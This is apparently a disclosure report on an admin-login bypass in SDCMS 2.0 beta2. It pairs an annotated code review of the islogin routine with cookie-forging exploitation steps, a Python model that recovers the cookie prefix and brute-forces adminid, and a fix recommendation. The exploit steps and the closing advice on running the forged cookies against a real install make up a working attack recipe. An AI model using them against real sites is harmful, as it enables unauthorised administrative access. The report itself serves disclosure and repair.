Brief description:

SDCMS admin backend bypass, direct entry. Tested version: 2.0 beta2; other versions not tested.
Detailed description:

islogin ' the routine that decides whether the caller is logged in

sub islogin()
    ' No session yet: fall back to the cookies
    if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then
        dim t0,t1,t2
        t0=sdcms.getint(sdcms.loadcookie("adminid"),0)   ' loadcookie reads straight from request.cookies
        t1=sdcms.loadcookie("islogin")
        t2=sdcms.loadcookie("loginkey")
        ' This check is badly done: sdcms.strlen(t2)<>50 is the only requirement placed on loginkey.
        ' Any 50 characters pass and execution continues.
        if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            dim data
            ' Look up the admin by ID; the ID comes from the cookie and is attacker-controlled
            data=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","")
            if ubound(data)<0 then
                sdcms.go "login.asp?act=out"
                exit sub
            else
                ' instr returns 0 when the value is not found, never a negative number,
                ' so the "<0" comparison can never be true and the decrypted loginkey is never really verified
                if instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then
                    sdcms.go "login.asp?act=out"
                    exit sub
                else
                    adminid=data(0,0)
                    adminname=data(1,0)
                    admin_page_lever=data(5,0)
                    admin_cate_array=data(6,0)
                    admin_cate_lever=data(7,0)
                    if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
                    if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
                    if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
                    if clng(admingroupid)<>0 then
                        admin_lever_where=" and menuid in("&admin_page_lever&")"
                    end if
                    ' Cookies accepted: the admin session is created here
                    sdcms.setsession "adminid",adminid
                    sdcms.setsession "adminname",adminname
                    sdcms.setsession "admingroupid",data(4,0)
                end if
            end if
        end if
    else
        ' A session already exists: only reload the group permissions
        data=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"","")
        if ubound(data)<0 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            admin_page_lever=data(0,0)
            admin_cate_array=data(1,0)
            admin_cate_lever=data(2,0)
            if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
            if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
            if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
            if clng(admingroupid)<>0 then
                admin_lever_where=" and menuid in("&admin_page_lever&")"
            end if
        end if
    end if
end sub
Proof of vulnerability:

Look at the functions that handle cookies:

public function loadcookie(t0)
    loadcookie=request.cookies(prefix&t0)
end function

public sub setcookie(byval t0,byval t1)
    response.cookies(prefix&t0)=t1
end sub

prefix:

'Variable prefix. If this program is installed more than once under one hosting space, configure a different value for each installation
dim prefix

prefix="1Jb8Ob"

'This value can be obtained by visiting admin/login.asp?act=out: the cookie names it sets back carry the prefix
sub out
    sdcms.setsession "adminid",""
    sdcms.setsession "adminname",""
    sdcms.setsession "admingroupid",""
    sdcms.setcookie "adminid",""
    sdcms.setcookie "loginkey",""
    sdcms.setcookie "islogin",""
    sdcms.go "login.asp"
end sub

Exploitation: set the cookie <prefix>loginkey to any 50 characters and <prefix>islogin to anything, then loop over <prefix>adminid (the default admin is 1) and request the admin backend; you are in.

Fix recommendation:

Fix the function: the comparison instr(...)<0 in islogin can never be true, because instr returns 0 (not a negative number) when the decrypted value is not found, so the loginkey is never actually verified. Reject when instr returns 0, and do not treat a client-supplied adminid cookie as an identity without a server-side check.
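To make the bypass concrete, the following is an added example written for this page, not SDCMS's own code or the reporter's: it recovers the prefix from the Set-Cookie headers that login.asp?act=out returns, builds the three forged cookies, and runs them through a Python model of the cookie branch of islogin() quoted above, both as written and with the instr comparison corrected. The Set-Cookie sample, the admin rows and fake_decrypt() are constructed stand-ins (the real output of sdcms.decrypt is unknown); nothing here talks to a server.

```python
# Added example (not SDCMS code): models the islogin() cookie path quoted
# above and builds the forged cookies the exploitation step describes.
# SAMPLE_SET_COOKIE, SAMPLE_ADMINS and fake_decrypt() are constructed
# stand-ins; the real sdcms.decrypt output is unknown.

COOKIE_SUFFIXES = ("adminid", "loginkey", "islogin")

# Constructed: what admin/login.asp?act=out might send back. sub out clears
# the three cookies, so their full names, prefix included, show up here.
SAMPLE_SET_COOKIE = [
    "ASPSESSIONIDQSQTRCSD=JKLMNOPQRSTUV; path=/",
    "1Jb8Obadminid=; path=/",
    "1Jb8Obloginkey=; path=/",
    "1Jb8Obislogin=; path=/",
]

# Constructed sd_admin rows keyed by adminid. islock is non-zero because the
# page's check logs out when data(3,0)=0.
SAMPLE_ADMINS = {
    3: {"adminname": "admin", "adminpass": "5f4dcc3b5aa765d61d8327deb882cf99",
        "islock": 1, "groupid": 0},
}


def extract_prefix(set_cookie_headers):
    """Recover the prefix: the one string that, joined with all three cookie
    suffixes, names cookies present in the logout response. None if absent."""
    names = {h.split("=", 1)[0].strip() for h in set_cookie_headers}
    for name in names:
        for suffix in COOKIE_SUFFIXES:
            if name.endswith(suffix):
                prefix = name[: len(name) - len(suffix)]
                if all(prefix + s in names for s in COOKIE_SUFFIXES):
                    return prefix
    return None


def forge_cookies(prefix, adminid):
    """Cookies satisfying every length check in islogin(): a numeric adminid,
    a non-empty islogin, and a loginkey of exactly 50 characters (any content)."""
    return {
        prefix + "adminid": str(adminid),
        prefix + "islogin": "x",
        prefix + "loginkey": "A" * 50,
    }


def getint(value, default=0):
    """Model of sdcms.getint(value, default): the integer, or the default."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return default


def instr(haystack, needle):
    """VBScript InStr: 1-based position of needle, 0 when absent. Never negative."""
    return haystack.find(needle) + 1


def fake_decrypt(islogin, loginkey):
    """Stand-in for sdcms.decrypt (assumption). Whatever the real function
    returns, a value that is not found gives InStr()=0, never a negative."""
    return "decrypted:" + islogin + loginkey[:4]


def islogin(cookies, prefix, admins, fixed=False):
    """Model of the no-session branch of islogin(). Returns the session values
    it would set, or None where the original redirects to login.asp?act=out.
    fixed=True applies the one-token fix: reject when InStr() returns 0."""
    t0 = getint(cookies.get(prefix + "adminid"), 0)
    t1 = cookies.get(prefix + "islogin", "")
    t2 = cookies.get(prefix + "loginkey", "")
    if t0 == 0 or len(t1) == 0 or len(t2) != 50:   # the three length checks
        return None
    row = admins.get(t0)           # "adminid=" & t0 lookup; t0 is attacker-chosen
    if row is None:
        return None
    pos = instr(row["adminname"] + row["adminpass"], fake_decrypt(t1, t2))
    # Original: instr(...) < 0, which can never be true, so the decrypted
    # token is never actually verified. The fix rejects on 0 (not found).
    rejected = (pos == 0) if fixed else (pos < 0)
    if rejected or row["islock"] == 0:
        return None
    return {"adminid": t0, "adminname": row["adminname"],
            "admingroupid": row["groupid"]}


def brute_adminid(prefix, check, max_id=100):
    """The exploit loop from the report: try adminid 1 (the default) upwards
    until check() accepts a forged cookie set. check() takes a cookie dict."""
    for adminid in range(1, max_id + 1):
        session = check(forge_cookies(prefix, adminid))
        if session is not None:
            return adminid, session
    return None


if __name__ == "__main__":
    p = extract_prefix(SAMPLE_SET_COOKIE)
    print("prefix:", p)
    print("bypass:", brute_adminid(p, lambda c: islogin(c, p, SAMPLE_ADMINS)))
    print("after fix:", brute_adminid(p, lambda c: islogin(c, p, SAMPLE_ADMINS, fixed=True)))
```

Run as a script, the adminid loop succeeds against the model with any 50-character loginkey and fails once the comparison rejects on 0. Against a real install you would feed extract_prefix() the actual Set-Cookie headers from login.asp?act=out and send the forge_cookies() output with an HTTP client while iterating adminid.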